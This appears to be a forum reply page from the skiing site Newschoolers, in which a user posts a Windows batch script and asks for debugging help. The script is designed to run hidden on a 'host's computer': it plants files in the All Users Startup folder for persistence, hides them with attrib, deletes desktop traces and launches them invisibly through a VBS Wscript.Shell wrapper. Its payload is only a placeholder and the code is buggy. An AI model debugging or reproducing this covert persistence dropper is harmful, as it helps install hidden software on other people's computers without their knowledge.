A quick word on blocking ads

It looks like you are using an ad blocker. That's okay. Who doesn't? But without advertising revenue, we can't keep making this site awesome. Click the link below for instructions on disabling adblock.

How to disable ad-blocker for Newschoolers

  • Home
  • News
    • Latest
    • Top Rated
    • Features
    • Podcasts
    • Tags
    • Interviews
    • Event Coverage
    • Opinions
    • Industry News
    • Gear
  • Forums
    • Categories
    • Ski Gabber
    • Non-Ski Gabber
    • Site Discussion
    • Media & Arts
    • Gear
    • Lady Gabber
    • Content Creators
    • AT & Backcountry
    • Regionals
  • Gear
    • Gear Guide 2024-25
    • Gear Guide 2023-24
    • The Roofbox Reviews
    • Editors' Picks
    • Gear Talk
  • Buy/Sell
    • Map View
  • Photos
    • Latest
    • Top Rated
  • Videos
    • Latest
    • Top Rated
    • Ladies
  • Store
  • More
    • Terrain Parks Guide
    • Contests
    • NS Giveaway
    • Top Rated Members
  • Search
  • Login
  • Login
BIRTHRIGHT | A Beau James Wells Film is Now Live!

Login to Newschoolers

Register Lost password?

Search Newschoolers

Preview

LOADING...
  • Forums
  • Non-Ski Gabber
  • Programmers of Newschoolers
  • Reply

Replying to Programmers of Newschoolers

Fluttershy:
Alright so ive been working on this program in batch that will run iteslf hidden on the hosts computer. i think ive got everything good excpet for the commands that are put into the directory "rip.bat". if i right click edit on the desktop where it got saved, then i can see all of the commands are in the file correctly. however, the file that originally creates the directory also opens the newly created "rip.bat". all that happens when the rip.bat file is opened is there is a blank console and no commands go through. does windows not allow one batch file to execute another batch file? if they do, could anybody help me debug my program?
++++K

@echo off
echo @echo off >> "ripp.bat"
echo ping localhost -n 2 >> "ripp.bat"
cls
ping localhost -n 2 >nul
::----insert commands for rip.bat here---::
echo echo hhhh >> "ripp.bat"
::---------------#####------------------::
::--move/hide--::
echo attrib +h "%userprofile%"\desktop\rip.bat" >> "rip.bat"
echo copy "%userprofile%"\desktop\ripp.bat "C:\Documents and Settings\All Users\Start
Menu\Programs\Startup" >> "rip.bat"
echo cls >> "rip.bat"
echo ping localhost -n 2 >> "rip.bat"
echo attrib +h "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ripp.bat" >> "rip.bat"
echo cls >> "rip.bat"
echo del "%userprofile%"\desktop\rip.bat" >> "rip.bat"
cls
::------###-----::
::--run hidden--::
echo CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False >> "invis.vbs"
echo wscript.exe C:\Documents and Settings\All Users\Start Menu\Programs\Startup\invis.vbs
"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ripp.bat" >> "invis.vbs"
cls
ping localhost -n 2 >nul
cls
copy "%userprofile%"\desktop\invis.vbs "C:\Documents and Settings\All Users\Start
Menu\Programs\Startup"
ping localhost -n 2 >nul
attrib +h "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\invis.vbs"
start "%userprofile%"\desktop\rip.bat
ping localhost -n 6 >nul
start "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\invis.vbs"

Click to expand post

Follow Us

Newsletter

Subscribe to our newsletter and stay up-to-date with the latest news from Newschoolers and our partners

Subscribe
Register Contact Advertise Privacy Policy Terms of Use
Newschoolers has affiliate partnerships so we may receive compensation for some links to products and services.
© 2025 NEWSCHOOLERS, INC.
NEWSCHOOLERS is a registered trademark of NEWSCHOOLERS, INC.
  • Bike
  • Fantasy Surfer
  • Newschoolers
  • Powder
  • Ridemonkey
  • Snowboarder
  • Surfer
  • TransWorld Skateboarding